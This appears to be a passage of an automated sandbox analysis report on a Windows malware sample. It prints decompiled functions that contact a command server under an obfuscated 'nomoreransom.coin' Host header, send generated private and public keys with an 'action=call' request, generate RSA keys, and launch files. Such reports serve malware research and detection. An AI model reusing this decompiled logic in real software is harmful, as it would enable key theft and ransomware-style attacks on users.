                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                        • String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
                                        • API String ID: 2781787645-472827701
                                        • Opcode ID: 4ebc019ab4199d1a4a2ec8a0be1361622fb489ff3610be888405083c0952f964
                                        • Instruction ID: 6640bade141ef743ca6347b5620a71077563d6e7125fdf7c890f93923689be12
                                        • Opcode Fuzzy Hash: 4ebc019ab4199d1a4a2ec8a0be1361622fb489ff3610be888405083c0952f964
                                        • Instruction Fuzzy Hash: 18E1AB7110C302AFD710DF25DC82B6BBBE5EF88714F14492CF685A7291D774AA05CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0FC67EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                        				long _v12;
                                        				void* _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				short _v68;
                                        				void* _t38;
                                        				void* _t40;
                                        				WCHAR* _t41;
                                        				long _t54;
                                        				long _t59;
                                        				WCHAR* _t62;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        				void* _t67;
                                        
                                        				_t64 = __ecx;
                                        				_t38 =  *(__ecx + 4);
                                        				if(_t38 != 0) {
                                        					InternetCloseHandle(_t38);
                                        				}
                                        				E0FC67CE0(_t64); // executed
                                        				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
                                        				_t65 = _t40;
                                        				_v12 = 0;
                                        				_v16 = _t65;
                                        				if(_t65 != 0) {
                                        					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
                                        					_t62 = _t41;
                                        					_v20 = _t62;
                                        					wsprintfW(_t62, L"%s", _a8);
                                        					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                        					if(_t63 != 0) {
                                        						_v68 = 0x6f0048;
                                        						_v64 = 0x740073;
                                        						_v60 = 0x20003a;
                                        						_v56 = 0x6f006e;
                                        						_v52 = 0x6f006d;
                                        						_v48 = 0x650072;
                                        						_v44 = 0x610072;
                                        						_v40 = 0x73006e;
                                        						_v36 = 0x6d006f;
                                        						_v32 = 0x63002e;
                                        						_v28 = 0x69006f;
                                        						_v24 = 0x6e;
                                        						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
                                        							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
                                        								GetLastError();
                                        							} else {
                                        								_t67 = _a20;
                                        								_t59 = _a24 - 1;
                                        								_a4 = 0;
                                        								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                        									while(1) {
                                        										_t54 = _a4;
                                        										if(_t54 == 0) {
                                        											goto L13;
                                        										}
                                        										 *((char*)(_t54 + _t67)) = 0;
                                        										_a4 = 0;
                                        										_v12 = 1;
                                        										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                        											continue;
                                        										} else {
                                        										}
                                        										goto L13;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					L13:
                                        					InternetCloseHandle(_t63); // executed
                                        					InternetCloseHandle(_v16);
                                        					VirtualFree(_v20, 0, 0x8000); // executed
                                        					return _v12;
                                        				} else {
                                        					return _t40;
                                        				}
                                        			}
                                        0x00000000
                                        0x0fc68037
                                        0x0fc68042
                                        0x0fc68049
                                        0x0fc68058
                                        0x00000000
                                        0x00000000
                                        0x0fc6805a
                                        0x00000000
                                        0x0fc68058
                                        0x0fc68030
                                        0x0fc6802c
                                        0x0fc6800d
                                        0x0fc67ff6
                                        0x0fc68062
                                        0x0fc68069
                                        0x0fc6806e
                                        0x0fc6807a
                                        0x0fc68089
                                        0x0fc67f3e
                                        0x0fc67f3e
                                        0x0fc67f3e

                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 0FC67F03
                                        • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FC67F22
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FC66EE6,ipv4bot.whatismyipaddress.com,0FC6FF10), ref: 0FC67F4F
                                        • wsprintfW.USER32 ref: 0FC67F63
                                        • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FC67F81
                                        • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FC67FEE
                                        • HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0FC68005
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FC68024
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FC68050
                                        • GetLastError.KERNEL32 ref: 0FC6805C
                                        • InternetCloseHandle.WININET(00000000), ref: 0FC68069
                                        • InternetCloseHandle.WININET(00000000), ref: 0FC6806E
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FC66EE6), ref: 0FC6807A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                        • String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
                                        • API String ID: 3906118045-3956618741
                                        • Opcode ID: 676a1be4d34343ce26236f9e9aa56cd03e5e6b799cb4470f38a2567c478210bd
                                        • Instruction ID: 3458bdc3a3d7790f4070b897b99bc738b22eda61b2be8f4755e5ea52edc4649f
                                        • Opcode Fuzzy Hash: 676a1be4d34343ce26236f9e9aa56cd03e5e6b799cb4470f38a2567c478210bd
                                        • Instruction Fuzzy Hash: 2C416031604209BBEB209F51DC8AFAE7FB9FF04B55F104119FA04B62C1CBB599548BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0FC64950() {
                                        				void* _v8;
                                        				void* _v12;
                                        				CHAR* _v16;
                                        				int _v20;
                                        				void* _v24;
                                        				int _v28;
                                        				void* _v32;
                                        				int _v36;
                                        				int _v40;
                                        				int _v44;
                                        				int _v48;
                                        				int _v52;
                                        				int _v60;
                                        				char _v80;
                                        				void* _t54;
                                        				void* _t55;
                                        				int _t79;
                                        				void* _t81;
                                        				short* _t97;
                                        				void* _t114;
                                        
                                        				Sleep(0x3e8); // executed
                                        				_t54 = E0FC64600(_t90, _t106); // executed
                                        				if(_t54 == 0) {
                                        					_t55 = CreateThread(0, 0, E0FC62D30, 0, 0, 0); // executed
                                        					_v8 = _t55;
                                        					if(_v8 != 0) {
                                        						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                        							_t90 = _v8;
                                        							TerminateThread(_v8, 0);
                                        						}
                                        						_t106 = _v8;
                                        						CloseHandle(_v8); // executed
                                        					}
                                        					E0FC646F0(); // executed
                                        					E0FC640E0(_t90, _t106);
                                        					E0FC66420( &_v80); // executed
                                        					_v40 = 0;
                                        					_v36 = 0;
                                        					_v28 = 0;
                                        					_v44 = 0;
                                        					E0FC663D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
                                        					_v48 = 0;
                                        					_v16 = 0;
                                        					if(E0FC64930(_v28) == 0) {
                                        						while(_v48 == 0) {
                                        							_t81 = E0FC65880(_v28, _v44, _v40, _v36,  &_v16); // executed
                                        							_t114 = _t114 + 0xc;
                                        							if(_t81 != 0) {
                                        								_v48 = 1;
                                        							} else {
                                        								Sleep(0x2710);
                                        							}
                                        						}
                                        						E0FC66390( &_v80);
                                        						_v32 = 0;
                                        						_v20 = 0;
                                        						_v52 = 0;
                                        						_v60 = 0;
                                        						__eflags = _v16;
                                        						if(_v16 == 0) {
                                        							L19:
                                        							E0FC64030();
                                        							InitializeCriticalSection(0xfc72a48);
                                        							__eflags = _v52;
                                        							if(__eflags == 0) {
                                        								E0FC63E20( &_v80);
                                        							} else {
                                        								E0FC64000(_v32, _v20, __eflags);
                                        							}
                                        							DeleteCriticalSection(0xfc72a48);
                                        							__eflags = E0FC63AA0();
                                        							if(__eflags != 0) {
                                        								E0FC643E0(__eflags);
                                        							}
                                        							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                        							__eflags = _v24;
                                        							if(__eflags != 0) {
                                        								GetModuleFileNameW(0, _v24, 0x100);
                                        								E0FC63BE0(_v24, _v24, __eflags);
                                        								VirtualFree(_v24, 0, 0x8000);
                                        							}
                                        							__eflags =  *0xfc72a44;
                                        							if( *0xfc72a44 != 0) {
                                        								_t97 =  *0xfc72a44; // 0x60000
                                        								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
                                        							}
                                        							ExitThread(0);
                                        						}
                                        						_v20 = lstrlenA(_v16);
                                        						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
                                        						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
                                        						__eflags = _t79;
                                        						if(_t79 != 0) {
                                        							_v52 = 1;
                                        							goto L19;
                                        						}
                                        						ExitProcess(0);
                                        					} else {
                                        						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                        						_t119 = _v12;
                                        						if(_v12 != 0) {
                                        							GetModuleFileNameW(0, _v12, 0x100);
                                        							E0FC63BE0(_v12,  &_v44, _t119);
                                        							VirtualFree(_v12, 0, 0x8000);
                                        						}
                                        						ExitProcess(0);
                                        					}
                                        				}
                                        				ExitProcess(0);
                                        			}

                                        APIs
                                        • Sleep.KERNEL32(000003E8), ref: 0FC6495B
                                          • Part of subcall function 0FC64600: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6465C
                                          • Part of subcall function 0FC64600: lstrcpyW.KERNEL32 ref: 0FC6467F
                                          • Part of subcall function 0FC64600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64686
                                          • Part of subcall function 0FC64600: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6469E
                                          • Part of subcall function 0FC64600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646AA
                                          • Part of subcall function 0FC64600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646B1
                                          • Part of subcall function 0FC64600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646CB
                                        • ExitProcess.KERNEL32 ref: 0FC6496C
                                        • CreateThread.KERNEL32 ref: 0FC64981
                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FC64999
                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0FC649AC
                                        • CloseHandle.KERNEL32(00000000), ref: 0FC649B6
                                        • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FC64A2A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FC64A44
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC64A5D
                                        • ExitProcess.KERNEL32 ref: 0FC64A65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                        • String ID: open
                                        • API String ID: 1803241880-2758837156
                                        • Opcode ID: 8cf060bb61fa9a09d8e094c97f46cc5850f79e57ec363523280a47177bd68d58
                                        • Instruction ID: 555a83c77560012020d4caa95d4e55fe54969427f751ac56659cd01f5e7902af
                                        • Opcode Fuzzy Hash: 8cf060bb61fa9a09d8e094c97f46cc5850f79e57ec363523280a47177bd68d58
                                        • Instruction Fuzzy Hash: 4871EE70A48305EBEB14DFA5DC9BFEE7775AB48712F104114E7017A1C1DBB86A44CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 66%
                                        			E0FC68150(intOrPtr __ecx, void* __edx) {
                                        				long* _v8;
                                        				intOrPtr _v12;
                                        				signed int _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v34;
                                        				short _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				char _v48;
                                        				long** _t37;
                                        				void* _t40;
                                        				struct HINSTANCE__* _t45;
                                        				_Unknown_base(*)()* _t46;
                                        				signed int _t54;
                                        				long _t55;
                                        				intOrPtr _t56;
                                        				signed int _t58;
                                        				signed int _t60;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        
                                        				_t54 = 0;
                                        				_v12 = __ecx;
                                        				_t37 =  &_v8;
                                        				_t63 = __edx;
                                        				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
                                        				if(_t37 == 0) {
                                        					L15:
                                        					return _t54;
                                        				} else {
                                        					_t58 = 0;
                                        					do {
                                        						_t3 = _t58 + 0x61; // 0x61
                                        						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                        						_t58 = _t58 + 1;
                                        					} while (_t58 < 0x1a);
                                        					_t7 = _t63 + 1; // 0x1
                                        					_t55 = _t7;
                                        					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
                                        					_t64 = _t40;
                                        					if(_t64 == 0 || _t63 >= _t55) {
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t64, 0, 0x8000);
                                        						return 0;
                                        					} else {
                                        						_v48 = 0x70797243;
                                        						_v44 = 0x6e654774;
                                        						_v40 = 0x646e6152;
                                        						_v36 = 0x6d6f;
                                        						_v34 = 0;
                                        						_v32 = 0x61766441;
                                        						_v28 = 0x32336970;
                                        						_v24 = 0x6c6c642e;
                                        						_v20 = 0;
                                        						_t45 = GetModuleHandleA( &_v32);
                                        						if(_t45 != 0) {
                                        							L7:
                                        							_t19 =  &_v48; // 0x70797243
                                        							_t46 = GetProcAddress(_t45, _t19);
                                        							if(_t46 == 0) {
                                        								goto L13;
                                        							} else {
                                        								_push(_t64);
                                        								_push(_t63);
                                        								_push(_v8);
                                        								if( *_t46() == 0) {
                                        									goto L13;
                                        								} else {
                                        									_t60 = 0;
                                        									if(_t63 != 0) {
                                        										_t56 = _v12;
                                        										_v16 = 0x1a;
                                        										do {
                                        											asm("cdq");
                                        											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                        											_t60 = _t60 + 1;
                                        										} while (_t60 < _t63);
                                        									}
                                        									_t54 = 1;
                                        								}
                                        							}
                                        						} else {
                                        							_t18 =  &_v32; // 0x61766441
                                        							_t45 = LoadLibraryA(_t18);
                                        							if(_t45 == 0) {
                                        								L13:
                                        								_t54 = 0;
                                        							} else {
                                        								goto L7;
                                        							}
                                        						}
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t64, 0, 0x8000); // executed
                                        						goto L15;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC6816D
                                        • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FC6819B
                                        • GetModuleHandleA.KERNEL32(?), ref: 0FC681EF
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC681FD
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6820C
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68255
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC68263
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68277
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC68285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 15f58e8e8a7653a9d91a90aa0e17f37926508452ba5aae16b574adaeea8470ff
                                        • Instruction ID: b1a00cf03c9581bfdc5dcd7a0afa047b6ba3549bd557542fbea6b59d584b133e
                                        • Opcode Fuzzy Hash: 15f58e8e8a7653a9d91a90aa0e17f37926508452ba5aae16b574adaeea8470ff
                                        • Instruction Fuzzy Hash: CD31EC75A0820AEFDB108FE5DC87BEEBB78FF04715F104069EA02B6181D775AA11CB65
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E0FC682A0(intOrPtr __ecx, intOrPtr __edx) {
                                        				long* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				char _v32;
                                        				char _v34;
                                        				short _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				char _v48;
                                        				long** _t25;
                                        				void* _t28;
                                        				struct HINSTANCE__* _t33;
                                        				_Unknown_base(*)()* _t34;
                                        				long _t40;
                                        				void* _t42;
                                        				void* _t46;
                                        				void* _t47;
                                        				void* _t48;
                                        
                                        				_t46 = 0;
                                        				_v16 = __ecx;
                                        				_t25 =  &_v8;
                                        				_v12 = __edx;
                                        				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
                                        				if(_t25 == 0) {
                                        					L10:
                                        					return _t46;
                                        				} else {
                                        					_t42 = 0;
                                        					do {
                                        						_t4 = _t42 + 0x61; // 0x61
                                        						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                        						_t42 = _t42 + 1;
                                        					} while (_t42 < 0x1a);
                                        					_t40 = __edx + 1;
                                        					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
                                        					_t47 = _t28;
                                        					if(_t47 == 0 || _v12 >= _t40) {
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t47, 0, 0x8000);
                                        						return 0;
                                        					} else {
                                        						_v48 = 0x70797243;
                                        						_v44 = 0x6e654774;
                                        						_v40 = 0x646e6152;
                                        						_v36 = 0x6d6f;
                                        						_v34 = 0;
                                        						_v32 = 0x61766441;
                                        						_v28 = 0x32336970;
                                        						_v24 = 0x6c6c642e;
                                        						_v20 = 0;
                                        						_t33 = GetModuleHandleA( &_v32);
                                        						if(_t33 != 0) {
                                        							L7:
                                        							_t19 =  &_v48; // 0x70797243
                                        							_t34 = GetProcAddress(_t33, _t19);
                                        							if(_t34 != 0) {
                                        								 *_t34(_v8, _v12, _v16);
                                        								_t46 =  !=  ? 1 : _t46;
                                        							}
                                        						} else {
                                        							_t18 =  &_v32; // 0x61766441
                                        							_t33 = LoadLibraryA(_t18);
                                        							if(_t33 != 0) {
                                        								goto L7;
                                        							}
                                        						}
                                        						CryptReleaseContext(_v8, 0);
                                        						VirtualFree(_t47, 0, 0x8000); // executed
                                        						goto L10;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC682C0
                                        • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FC682E8
                                        • GetModuleHandleA.KERNEL32(?), ref: 0FC6833D
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC6834B
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6835A
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC6837E
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6838C
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683A0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 1b459145bd34ae353541e6873e9be96523e3f7ce7fddb8289e2290ddaa9a6c5f
                                        • Instruction ID: 0e253a7663d20da8492f15923749da943d28886e81b67bcf7c14ed8b4efae197
                                        • Opcode Fuzzy Hash: 1b459145bd34ae353541e6873e9be96523e3f7ce7fddb8289e2290ddaa9a6c5f
                                        • Instruction Fuzzy Hash: 4E319571A08209EFDF108FA6DC4BBEEBB78EF44711F144069FA05F6180D7789A108B65
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0FC662B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				long* _v8;
                                        				long* _v12;
                                        				int _v16;
                                        				long** _t15;
                                        				long* _t16;
                                        				long _t23;
                                        
                                        				_t15 =  &_v8;
                                        				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                        				if(_t15 != 0) {
                                        					L6:
                                        					_t16 = _v8;
                                        					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
                                        					if(_t16 == 0) {
                                        					}
                                        					_v16 = 0;
                                        					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                        					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
                                        					CryptDestroyKey(_v12);
                                        					CryptReleaseContext(_v8, 0);
                                        					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
                                        					return 1;
                                        				}
                                        				_t23 = GetLastError();
                                        				if(_t23 != 0x80090016) {
                                        					return 0;
                                        				}
                                        				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                        				if(_t23 != 0) {
                                        					goto L6;
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0FC649C6,?,0FC649CE), ref: 0FC662C5
                                        • GetLastError.KERNEL32(?,0FC649CE), ref: 0FC662CF
                                        • CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC649CE), ref: 0FC662EB
                                        • CryptGenKey.ADVAPI32(0FC649CE,0000A400,08000001,?,?,0FC649CE), ref: 0FC66317
                                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FC6633B
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FC66353
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0FC6635D
                                        • CryptReleaseContext.ADVAPI32(0FC649CE,00000000), ref: 0FC66369
                                        • CryptAcquireContextW.ADVAPI32(0FC649CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FC6637E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 137402220-1948191093
                                        • Opcode ID: ef4b6fede264b1eb588b787d4d84579ae96539a849708fdb2b9aa4ca602ea959
                                        • Instruction ID: f85b284154f0687b773d20317f2ab2f9188a350b30da5406d0fae8422d637a86
                                        • Opcode Fuzzy Hash: ef4b6fede264b1eb588b787d4d84579ae96539a849708fdb2b9aa4ca602ea959
                                        • Instruction Fuzzy Hash: DA21447579830ABBDB20CEE1DD8BFDA3769AB48B11F004518F702EA1C0D6B5A9109761
                                        Uniqueness
                                        • Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E0FC646F0() {
                                        				char* _v12;
                                        				char* _v16;
                                        				char* _v20;
                                        				char* _v24;
                                        				char* _v28;
                                        				char* _v32;
                                        				char* _v36;
                                        				char* _v40;
                                        				char* _v44;
                                        				char* _v48;
                                        				char* _v52;
                                        				char* _v56;
                                        				char* _v60;
                                        				char* _v64;
                                        				char* _v68;
                                        				char* _v72;
                                        				char* _v76;
                                        				char* _v80;
                                        				char* _v84;
                                        				char* _v88;
                                        				char* _v92;
                                        				char* _v96;
                                        				char* _v100;
                                        				char* _v104;
                                        				char* _v108;
                                        				char* _v112;
                                        				char* _v116;
                                        				char* _v120;
                                        				char* _v124;
                                        				char* _v128;
                                        				char* _v132;
                                        				char* _v136;
                                        				char* _v140;
                                        				char* _v144;
                                        				char* _v148;
                                        				char* _v152;
                                        				char* _v156;
                                        				char* _v160;
                                        				char* _v164;
                                        				void* _v172;
                                        				void* _t49;
                                        				void* _t50;
                                        				int _t51;
                                        				int _t52;
                                        				int _t53;
                                        				void* _t60;
                                        				WCHAR* _t62;
